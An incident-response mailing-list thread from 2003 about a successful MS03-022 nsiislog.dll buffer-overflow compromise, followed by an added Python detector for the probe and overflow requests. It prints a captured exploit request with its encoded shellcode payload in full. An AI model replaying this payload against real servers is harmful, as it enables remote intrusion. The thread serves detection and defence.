[unisog] Successful attack using MS03-022 vuln

Jordan Wiens jwiens at nersp.nerdc.ufl.edu
Thu Sep 25 15:29:03 GMT 2003


We've seen compromises via this exploit as well.  First one was approx.
2-3 months ago and took a while to figure out what it was; I don't think
Dragon had logs for it at that point.

Fortunately, this is not the default install config and requires someone
to be install-happy and click the 'install everything' option of the
webserver.

-- 
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061

On Wed, 24 Sep 2003, Mike Iglesias wrote:

> We've been seeing probing against web servers looking for
> /scripts/nsiislog.dll, which is used by Windows Media Services to
> deliver multicast streaming media (nsiislog.dll is the subject of MS03-022,
> which fixes a buffer overflow in it).  The probes are usually a "GET
> /scripts/nsiislog.dll".
>
> We have also seen some "POST /scripts/nsiislog.dll" that look like
> this:
>
> POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
> Accept: */*{D}{A}
> User-Agent: NSPlayer/4.1.0.3917{D}{A}
> Content-Type: text/plain{D}{A}
> Content-Length: 9996{D}{A}
> Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
> Connection: Close{D}{A}
> {D}{A}
> MX_STATS_LogLine: *** huge line to cause a buffer overflow ***
>
> The huge MX_STATS_LogLine up until today did not carry much other than
> repeated hex 'cc' bytes.
>
> Today we had a system successfully hacked via the buffer overflow.  About
> 20 seconds after the "POST" attack, they had a telnet session open using
> port 34816 on the target system.  I cannot tell what they did to the
> system once they had access.
>
> The attacks came from 213.129.194.25 and 80.56.228.218 (both in the
> Netherlands).  I've appended a packet dump from our Dragon IDS below
> in case anyone finds it useful.
>
>
> Mike Iglesias                          Email:       iglesias at draco.acs.uci.edu
> University of California, Irvine       phone:       949-824-6926
> Network & Academic Computing Services  FAX:         949-824-2069
>
> POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
> Accept: */*{D}{A}
> User-Agent: NSPlayer/4.1.0.3917{D}{A}
> Content-Type: text/plain{D}{A}
> Content-Length: 9996{D}{A}
> Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
> Connection: Close{D}{A}
> {D}{A}
> MX_STATS_LogLine: {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> <repeated lines removed>
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{EB}{2}{EB}{5}{E8}{F9}{FF}{FF}{FF}
> [{81}{EB}MC"{11}{8B}{C3}{5}fC"{11}f{B9}{15}{3}{80}0{FB}@g{E2}{F9}3{A3}{F9}{FB}r
> fS{6}{4}{4}vf7{6}{4}{4}{A8}@{F6}{BD}{D9}{EA}{F8}fS{6}{4}{4}{A8}{93}{FB}{FB}
> {4}{4}{13}{91}{FA}{FB}{FB}C{CD}{BD}{D9}{EA}{F8}~S{6}{4}{4}{AB}{4}n7{6}{4}
> {4}{F0};{F4}{7F}{BE}{FA}{FB}{FB}vf;{6}{4}{4}{A8}@{BA}{BD}{D9}{EA}{F8}fS{6}{4}
> {4}{A8}{AB}{13}{CC}{FA}{FB}{FB}v~{8F}{5}{4}{4}{AB}{93}{FA}{FA}{FB}{FB}{4}nK{6}
> {4}{4}{C8} {A8}{A8}{A8}{91}{FD}{91}{FA}{91}{F9}{4}n;{6}{4}{4}r~{A7}{5}{4}
> {4}{9D}<~{9F}{5}{4}{4}{F9}{FB}{9D}<~{9D}{5}{4}{4}s{FB}<~{93}{5}{4}{4}{FB}
> {FB}{FB}{FB}vf{9F}{5}{4}{4}{91}{EB}{A8}{4}N{A7}{5}{4}{4}{4}nG{6}{4}{4}
> {F0};{8F}{E8}vn{9C}{5}{4}{4}{5}{F9}{{C1}{FB}{F4}{7F}F{FB}{FB}{FB}{10}/{91}{FA}
> {4}N{A7}{5}{4}{4}{4}nC{6}{4}{4}{F0};{F4}~^{FB}{FB}{FB}<~{9B}{5}{4}{4}{EB}
> {FB}{FB}{FB}v~{9B}{5}{4}{4}{AB}v~{9F}{5}{4}{4}{AB}{4}N{A7}{5}{4}{4}{4}
> nO{6}{4}{4}r~{A3}{5}{4}{4}{7}vF{F3}{5}{4}{4}{C8};B{BF}{FB}{FB}{FB}{8}Q
> <~{CF}{5}{4}{4}{FB}{FA}{FB}{FB}p~{A3}{5}{4}{4}r~{BF}{5}{4}{4}r~{B3}{5}{4}
> {4}r~{BB}{5}{4}{4}<~{F3}{5}{4}{4}{BF}{FB}{FB}{FB}{C8} v~{3}{6}{4}{4}{AB}
> v~{F3}{5}{4}{4}{AB}{A8}{A8}{93}{FB}{FB}{FB}{F3}{91}{FA}{A8}{A8}C{8C}{BD}{D9}{EA}
> {F8}~S{6}{4}{4}{AB}{A8}{4}n?{6}{4}{4}{4}N{A3}{5}{4}{4}{4}nW{6}{4}{4}
> {12}{A0}{4}{4}{4}{4}n3{6}{4}{4}{13}v{FA}{FB}{FB}3{EF}{FB}{FB}{AC}{AD}{13}{FB}
> {FB}{FB}{FB}z{D7}{DF}{F9}{BE}{D9}{EA}C{E}{BE}{D9}{EA}{F8}{FF}{DF}x?{FF}{AB}{9F}{9C}
> {4}{CD}{FB}{FB}r{9E}{3}{13}{FB}{FB}{FB}{FB}z{D7}{DF}{D8}{BE}{D9}{EA}C{AC}{BE}{D9}
> {EA}{F8}{FF}{DF}x?{FF}r{BE}{7}{9F}{9C}r{DD}{FB}{FB}p{86}{F3}{9D}z{C4}{B6}{A1}{8E}
> {F4}p{C}{F8}{8D}{C7}z{C5}{AB}{BE}{FB}{FB}{8E}{F9}{10}{F3}z{14}{FB}{FB}{FA}{FB}{10}
> {19}r{86}{B}r{8E}{17}p{86}{F7}Bm{FB}{FB}{FB}{C9};{9}Ur{86}{F}p4{D0}{B6}{F7}p{AD}
> {83}{F8}{AE}{B}p{A1}{DB}{F8}{A6}{B}{C8};p{C0}{F8}{86}{B}p{8E}{F7}{AA}{8}]{8E}
> {FE}x?{FF}{10}{F1}{A2}x8{FF}{BB}{C0}{B9}{E3}{8E}{1F}{C0}{B9}{E3}{8E}{F9}{10}{B8}p
> {89}{DF}{F8}{8E}{B}*{1B}{F8}={F4}L{FB}p{81}{E7}:{1B}{F9}{F8}{BE}{B}{F8}<p{FB}{F8}
> {BE}{B}p{B6}{F}r{B6}{F7}p{A6}{EB}r{F8}x{96}{EB}{FF}p{8E}{17}{{C2}{FB}{8E}|{9F}{9C}
> t{FD}{FB}{FB}x?{FF}{A5}{A4}29{F7}{FB}p{86}{B}{12}{99}{4}{4}{4}3{FB}{FB}{FB}p{BE}
> {EB}zSg{FB}{FB}{FB}{FB}{FB}{FA}{FB}C{FB}{FB}{FB}{FB}28{B7}{94}{9A}{9F}{B7}{92}{99}
> {89}{9A}{89}{82}{BA}{FB}{BE}{83}{92}{8F}{AB}{89}{94}{98}{9E}{88}{88}{FB}{B8}{89}{9E}
> {9A}{8F}{9E}{AB}{89}{94}{98}{9E}{88}{88}{BA}{FB}{FB}{AC}{A8}{C9}{A4}{C8}{C9}{D5}{BF}
> {B7}{B7}{FB}{AC}{A8}{BA}{A8}{94}{98}{90}{9E}{8F}{BA}{FB}{99}{92}{95}{9F}{FB}{97}{92}
> {88}{8F}{9E}{95}{FB}{9A}{98}{98}{9E}{8B}{8F}{FB}{AC}{A8}{BA}{A8}{8F}{9A}{89}{8F}{8E}
> {8B}{FB}{98}{97}{94}{88}{9E}{88}{94}{98}{90}{9E}{8F}{FB}{FB}{98}{96}{9F}{FB}{E9}{C4}
> {FC}{FF}{FF}t{F9}u{F7}3{13}{F0}@
>
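Added example (not part of either message above, and not code from UF or UCI): a small Python classifier for the request pattern Mike describes, intended for running over captured HTTP requests from an IDS or web log. It flags a bare GET for /scripts/nsiislog.dll as a probe and a POST whose Content-Length or MX_STATS_LogLine body is oversized as an overflow attempt, and it reports whether the log line is a single repeated filler byte (the 0xCC padding seen in the thread). The 1024-byte threshold, the 90% filler ratio, the function names and the three sample requests are all my assumptions; only the path, header names and the 9996 Content-Length come from the post.

```python
"""Classify raw HTTP requests for the nsiislog.dll probe/overflow pattern."""
from dataclasses import dataclass
from typing import Optional, Tuple, Dict

# Assumed thresholds (not from the original post). A legitimate Windows Media
# Services log line is short; the captured attack carried Content-Length: 9996.
SUSPECT_BODY_LENGTH = 1024
FILLER_FRACTION = 0.9
TARGET_PATH = "/scripts/nsiislog.dll"


@dataclass
class Verdict:
    method: str
    path: str
    content_length: int
    logline_length: int
    fill_byte: Optional[int]   # byte value if the log line is mostly one repeated byte
    reason: str                # "probe", "overflow", or "" when nothing is flagged


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, bytes], bytes]:
    """Split a raw HTTP/1.0 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip()
    return method.decode(), path.decode(), headers, body


def dominant_fill(data: bytes, min_fraction: float = FILLER_FRACTION) -> Optional[int]:
    """Return the byte value making up at least min_fraction of data, else None."""
    if not data:
        return None
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    top = max(range(256), key=counts.__getitem__)
    return top if counts[top] / len(data) >= min_fraction else None


def classify(raw: bytes) -> Verdict:
    """Apply the probe/overflow heuristics described in the thread to one request."""
    method, path, headers, body = parse_request(raw)
    content_length = int(headers.get("content-length", b"0").decode() or 0)
    prefix = b"MX_STATS_LogLine:"
    logline = body[len(prefix):].strip() if body.startswith(prefix) else b""
    # Only look for filler when the line is long enough for the ratio to mean anything.
    fill = dominant_fill(logline) if len(logline) >= 64 else None
    reason = ""
    if path.lower().startswith(TARGET_PATH):
        if method == "GET":
            reason = "probe"
        elif method == "POST" and (content_length >= SUSPECT_BODY_LENGTH
                                   or len(logline) >= SUSPECT_BODY_LENGTH):
            reason = "overflow"
    return Verdict(method, path, content_length, len(logline), fill, reason)


# Constructed sample requests (assumptions for illustration, not captured traffic).
PROBE = b"GET /scripts/nsiislog.dll HTTP/1.0\r\nHost: media.example\r\n\r\n"
BENIGN = (b"POST /scripts/nsiislog.dll HTTP/1.0\r\nContent-Length: 36\r\n\r\n"
          b"MX_STATS_LogLine: 10.0.0.5 - play ok")
OVERSIZED = (b"POST /scripts/nsiislog.dll HTTP/1.0\r\nUser-Agent: NSPlayer/4.1.0.3917\r\n"
             b"Content-Type: text/plain\r\nContent-Length: 9996\r\nConnection: Close\r\n\r\n"
             b"MX_STATS_LogLine: " + b"\xcc" * 9978)

if __name__ == "__main__":
    for sample in (PROBE, BENIGN, OVERSIZED):
        v = classify(sample)
        print(f"{v.method} {v.path} len={v.logline_length} "
              f"fill={None if v.fill_byte is None else hex(v.fill_byte)} -> {v.reason or 'ok'}")
```

The filler check is deliberately separate from the verdict: a long line of repeated bytes is a strong hint of padding, but the size alone is what decides the verdict, so a later payload that swaps the padding for something else is still caught.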